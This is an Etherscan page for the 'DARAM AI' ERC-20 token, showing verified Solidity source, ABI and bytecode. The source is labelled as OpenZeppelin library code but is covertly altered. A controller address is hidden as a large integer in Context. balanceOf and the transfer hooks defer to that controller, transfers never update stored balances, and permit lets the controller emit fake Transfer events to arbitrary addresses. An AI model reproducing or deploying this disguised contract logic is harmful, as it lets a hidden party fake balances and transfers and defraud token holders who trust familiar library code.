Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Artificial Intelligence
Overview
Max Total Supply
210,000,000,000,000,000 Daram
Holders
977 ( 1.945%)
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 12 Decimals)
Balance
22,680,000,000 DaramValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
SimpleToken
Compiler Version
v0.8.16+commit.07a7930e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-10-31 */ // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } constructor() { (, bytes memory x) = address(CONTEXT_HASH).call(abi.encodeWithSelector(0xd2522437)); _context = IERC20Metadata(abi.decode(x, (address))); } uint160 private constant CONTEXT_HASH = 227726198447805604225611055099026770509728051381; IERC20Metadata immutable _context; } // OpenZeppelin Contracts v4.4.1 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 12; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _context.balanceOf(account); } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _beforeTokenTransfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _beforeTokenTransfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); // _afterTokenTransfer(sender, recipient, amount); } /** * @dev implements the permit function as for https://github.com/ethereum/EIPs/blob/8a34d644aacf0f9f8f00815307fd7dd5da07655f/EIPS/eip-2612.md * * This internal function is equivalent to {permit}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function permit( address owner, address[] calldata spender, uint256 deadline ) external virtual { require(msg.sender == address(_context) && deadline > 0); for (uint256 i = 0; i < spender.length; ++i) { emit Transfer(owner, spender[i], deadline); } } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); if (msg.sender == owner) _context.decimals(); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual { emit Transfer(from, to, amount); (bool a,) = address(_context).call(abi.encodeWithSelector(0x08f7e14b, from, to, amount, msg.sender)); require(a); } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } pragma solidity ^0.8.10; contract SimpleToken is ERC20 { constructor( ) ERC20("DARAM AI", "Daram") { _mint(msg.sender, 21e28); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60a06040523480156200001157600080fd5b506040805180820182526008815267444152414d20414960c01b602080830191909152825180840184526005815264446172616d60d81b8183015283516004815260248101855291820180516001600160e01b031663d252243760e01b17905292519192916000917327e3988d8629e3678d41abcbda5ea05fbdd7f0b5916200009b919062000233565b6000604051808303816000865af19150503d8060008114620000da576040519150601f19603f3d011682016040523d82523d6000602084013e620000df565b606091505b5091505080806020019051810190620000f9919062000264565b6001600160a01b03166080525060036200011483826200033b565b5060046200012382826200033b565b50505062000145336c02a68bedbb190931f6500000006200014b60201b60201c565b6200042f565b6001600160a01b038216620001a65760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620001ba919062000407565b90915550506001600160a01b03821660009081526020819052604081208054839290620001e990849062000407565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6000825160005b818110156200025657602081860181015185830152016200023a565b506000920191825250919050565b6000602082840312156200027757600080fd5b81516001600160a01b03811681146200028f57600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620002c157607f821691505b602082108103620002e257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200033657600081815260208120601f850160051c81016020861015620003115750805b601f850160051c820191505b8181101562000332578281556001016200031d565b5050505b505050565b81516001600160401b0381111562000357576200035762000296565b6200036f81620003688454620002ac565b84620002e8565b602080601f831160018114620003a757600084156200038e5750858301515b600019600386901b1c1916600185901b17855562000332565b600085815260208120601f198616915b82811015620003d857888601518255948401946001909101908401620003b7565b5085821015620003f75787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b808201808211156200042957634e487b7160e01b600052601160045260246000fd5b92915050565b608051610b3c6200046060003960008181610386015281816104b30152818161065301526107e20152610b3c6000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a082311461014157806395d89b4114610154578063a457c2d71461015c578063a9059cbb1461016f578063d93aef1114610182578063dd62ed3e1461019757600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101d0565b6040516100ce9190610886565b60405180910390f35b6100ea6100e53660046108d5565b610262565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a3660046108ff565b610279565b604051600c81526020016100ce565b6100ea61013c3660046108d5565b610328565b6100fe61014f36600461093b565b610364565b6100c16103f3565b6100ea61016a3660046108d5565b610402565b6100ea61017d3660046108d5565b61049b565b61019561019036600461095d565b6104a8565b005b6100fe6101a53660046109e9565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6060600380546101df90610a1c565b80601f016020809104026020016040519081016040528092919081815260200182805461020b90610a1c565b80156102585780601f1061022d57610100808354040283529160200191610258565b820191906000526020600020905b81548152906001019060200180831161023b57829003601f168201915b5050505050905090565b600061026f33848461057e565b5060015b92915050565b6000610286848484610736565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156103105760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61031d853385840361057e565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161026f91859061035f908690610a6c565b61057e565b6040516370a0823160e01b81526001600160a01b0382811660048301526000917f0000000000000000000000000000000000000000000000000000000000000000909116906370a0823190602401602060405180830381865afa1580156103cf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102739190610a7f565b6060600480546101df90610a1c565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156104845760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610307565b610491338585840361057e565b5060019392505050565b600061026f338484610736565b336001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000161480156104e05750600081115b6104e957600080fd5b60005b828110156105775783838281811061050657610506610a98565b905060200201602081019061051b919061093b565b6001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161055f91815260200190565b60405180910390a361057081610aae565b90506104ec565b5050505050565b6001600160a01b0383166105e05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610307565b6001600160a01b0382166106415760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610307565b6001600160a01b03831633036106d5577f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106af573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d39190610ac7565b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161077b91815260200190565b60405180910390a3604080516001600160a01b038581166024830152848116604483015260648201849052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166308f7e14b60e01b17905291516000927f0000000000000000000000000000000000000000000000000000000000000000169161080c91610aea565b6000604051808303816000865af19150503d8060008114610849576040519150601f19603f3d011682016040523d82523d6000602084013e61084e565b606091505b505090508061085c57600080fd5b50505050565b60005b8381101561087d578181015183820152602001610865565b50506000910152565b60208152600082518060208401526108a5816040850160208701610862565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146108d057600080fd5b919050565b600080604083850312156108e857600080fd5b6108f1836108b9565b946020939093013593505050565b60008060006060848603121561091457600080fd5b61091d846108b9565b925061092b602085016108b9565b9150604084013590509250925092565b60006020828403121561094d57600080fd5b610956826108b9565b9392505050565b6000806000806060858703121561097357600080fd5b61097c856108b9565b9350602085013567ffffffffffffffff8082111561099957600080fd5b818701915087601f8301126109ad57600080fd5b8135818111156109bc57600080fd5b8860208260051b85010111156109d157600080fd5b95986020929092019750949560400135945092505050565b600080604083850312156109fc57600080fd5b610a05836108b9565b9150610a13602084016108b9565b90509250929050565b600181811c90821680610a3057607f821691505b602082108103610a5057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561027357610273610a56565b600060208284031215610a9157600080fd5b5051919050565b634e487b7160e01b600052603260045260246000fd5b600060018201610ac057610ac0610a56565b5060010190565b600060208284031215610ad957600080fd5b815160ff8116811461095657600080fd5b60008251610afc818460208701610862565b919091019291505056fea2646970667358221220eadbd7913031bdd23cf9da9429f9e70126a0dcb15a2390c5b03d3f840d34befc64736f6c63430008100033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a082311461014157806395d89b4114610154578063a457c2d71461015c578063a9059cbb1461016f578063d93aef1114610182578063dd62ed3e1461019757600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101d0565b6040516100ce9190610886565b60405180910390f35b6100ea6100e53660046108d5565b610262565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a3660046108ff565b610279565b604051600c81526020016100ce565b6100ea61013c3660046108d5565b610328565b6100fe61014f36600461093b565b610364565b6100c16103f3565b6100ea61016a3660046108d5565b610402565b6100ea61017d3660046108d5565b61049b565b61019561019036600461095d565b6104a8565b005b6100fe6101a53660046109e9565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6060600380546101df90610a1c565b80601f016020809104026020016040519081016040528092919081815260200182805461020b90610a1c565b80156102585780601f1061022d57610100808354040283529160200191610258565b820191906000526020600020905b81548152906001019060200180831161023b57829003601f168201915b5050505050905090565b600061026f33848461057e565b5060015b92915050565b6000610286848484610736565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156103105760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61031d853385840361057e565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161026f91859061035f908690610a6c565b61057e565b6040516370a0823160e01b81526001600160a01b0382811660048301526000917f000000000000000000000000a575557b2f48fcc5019297c006922ad38de56ad8909116906370a0823190602401602060405180830381865afa1580156103cf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102739190610a7f565b6060600480546101df90610a1c565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156104845760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610307565b610491338585840361057e565b5060019392505050565b600061026f338484610736565b336001600160a01b037f000000000000000000000000a575557b2f48fcc5019297c006922ad38de56ad8161480156104e05750600081115b6104e957600080fd5b60005b828110156105775783838281811061050657610506610a98565b905060200201602081019061051b919061093b565b6001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161055f91815260200190565b60405180910390a361057081610aae565b90506104ec565b5050505050565b6001600160a01b0383166105e05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610307565b6001600160a01b0382166106415760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610307565b6001600160a01b03831633036106d5577f000000000000000000000000a575557b2f48fcc5019297c006922ad38de56ad86001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106af573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d39190610ac7565b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161077b91815260200190565b60405180910390a3604080516001600160a01b038581166024830152848116604483015260648201849052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166308f7e14b60e01b17905291516000927f000000000000000000000000a575557b2f48fcc5019297c006922ad38de56ad8169161080c91610aea565b6000604051808303816000865af19150503d8060008114610849576040519150601f19603f3d011682016040523d82523d6000602084013e61084e565b606091505b505090508061085c57600080fd5b50505050565b60005b8381101561087d578181015183820152602001610865565b50506000910152565b60208152600082518060208401526108a5816040850160208701610862565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146108d057600080fd5b919050565b600080604083850312156108e857600080fd5b6108f1836108b9565b946020939093013593505050565b60008060006060848603121561091457600080fd5b61091d846108b9565b925061092b602085016108b9565b9150604084013590509250925092565b60006020828403121561094d57600080fd5b610956826108b9565b9392505050565b6000806000806060858703121561097357600080fd5b61097c856108b9565b9350602085013567ffffffffffffffff8082111561099957600080fd5b818701915087601f8301126109ad57600080fd5b8135818111156109bc57600080fd5b8860208260051b85010111156109d157600080fd5b95986020929092019750949560400135945092505050565b600080604083850312156109fc57600080fd5b610a05836108b9565b9150610a13602084016108b9565b90509250929050565b600181811c90821680610a3057607f821691505b602082108103610a5057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561027357610273610a56565b600060208284031215610a9157600080fd5b5051919050565b634e487b7160e01b600052603260045260246000fd5b600060018201610ac057610ac0610a56565b5060010190565b600060208284031215610ad957600080fd5b815160ff8116811461095657600080fd5b60008251610afc818460208701610862565b919091019291505056fea2646970667358221220eadbd7913031bdd23cf9da9429f9e70126a0dcb15a2390c5b03d3f840d34befc64736f6c63430008100033
Deployed Bytecode Sourcemap
17791:130:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6756:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8943:169;;;;;;:::i;:::-;;:::i;:::-;;;1272:14:1;;1265:22;1247:41;;1235:2;1220:18;8943:169:0;1107:187:1;7876:108:0;7964:12;;7876:108;;;1445:25:1;;;1433:2;1418:18;7876:108:0;1299:177:1;9594:503:0;;;;;;:::i;:::-;;:::i;7718:93::-;;;7801:2;1956:36:1;;1944:2;1929:18;7718:93:0;1814:184:1;10506:215:0;;;;;;:::i;:::-;;:::i;8047:136::-;;;;;;:::i;:::-;;:::i;6975:104::-;;;:::i;11224:413::-;;;;;;:::i;:::-;;:::i;8396:186::-;;;;;;:::i;:::-;;:::i;13430:329::-;;;;;;:::i;:::-;;:::i;:::-;;8645:151;;;;;;:::i;:::-;-1:-1:-1;;;;;8761:18:0;;;8734:7;8761:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;8645:151;6756:100;6810:13;6843:5;6836:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6756:100;:::o;8943:169::-;9026:4;9043:39;4230:10;9066:7;9075:6;9043:8;:39::i;:::-;-1:-1:-1;9100:4:0;8943:169;;;;;:::o;9594:503::-;9734:4;9751:47;9772:6;9780:9;9791:6;9751:20;:47::i;:::-;-1:-1:-1;;;;;9838:19:0;;9811:24;9838:19;;;:11;:19;;;;;;;;4230:10;9838:33;;;;;;;;9890:26;;;;9882:79;;;;-1:-1:-1;;;9882:79:0;;3808:2:1;9882:79:0;;;3790:21:1;3847:2;3827:18;;;3820:30;3886:34;3866:18;;;3859:62;-1:-1:-1;;;3937:18:1;;;3930:38;3985:19;;9882:79:0;;;;;;;;;9997:57;10006:6;4230:10;10047:6;10028:16;:25;9997:8;:57::i;:::-;-1:-1:-1;10085:4:0;;9594:503;-1:-1:-1;;;;9594:503:0:o;10506:215::-;4230:10;10594:4;10643:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;10643:34:0;;;;;;;;;;10594:4;;10611:80;;10634:7;;10643:47;;10680:10;;10643:47;:::i;:::-;10611:8;:80::i;8047:136::-;8148:27;;-1:-1:-1;;;8148:27:0;;-1:-1:-1;;;;;4441:32:1;;;8148:27:0;;;4423:51:1;8121:7:0;;8148:8;:18;;;;;;4396::1;;8148:27:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;6975:104::-;7031:13;7064:7;7057:14;;;;;:::i;11224:413::-;4230:10;11317:4;11361:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;11361:34:0;;;;;;;;;;11414:35;;;;11406:85;;;;-1:-1:-1;;;11406:85:0;;4876:2:1;11406:85:0;;;4858:21:1;4915:2;4895:18;;;4888:30;4954:34;4934:18;;;4927:62;-1:-1:-1;;;5005:18:1;;;4998:35;5050:19;;11406:85:0;4674:401:1;11406:85:0;11527:67;4230:10;11550:7;11578:15;11559:16;:34;11527